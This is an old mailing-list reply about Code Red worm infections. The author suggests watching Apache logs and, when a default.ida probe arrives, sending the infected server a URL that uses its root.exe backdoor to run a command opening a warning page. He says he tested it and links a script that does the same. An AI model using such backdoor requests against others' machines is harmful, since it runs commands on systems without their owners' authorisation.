On Thu, 9 Aug 2001, Thomas T. Veldhouse wrote:

> You could write an Apache module :)

You wouldn't even need to write a module. It wouldn't be a hard perl or
python program to write. Watch access.log, when you get a default.ida
request throw up a http request like this:

http://infected.host.com/scripts/root.exe?/c+start%%20http://www.clean-host.net/codered-warning.html
(See http://www.stone.nu/projects/python_scripts/code_red_warn.py.gz for a
manual python example. I created a slightly more informative page...
http://hyperdrive.geekapt.homeip.net/codered.html)

I tested it and it worked. I instantly got about 50 hits to my Code Red
warning page. I was amused. If only I knew my NT command line better...but
why would I want to. It is NT after all....

If I knew perl better I'd be tempted to do it. Hell, I'm tempted to learn
more perl so I could do it. :)

Andrew S. Zbikowski | http://www.ringworld.org
"We can learn much more from wise words, little
from wisecracks and less from wise guys."
--William Arthur Ward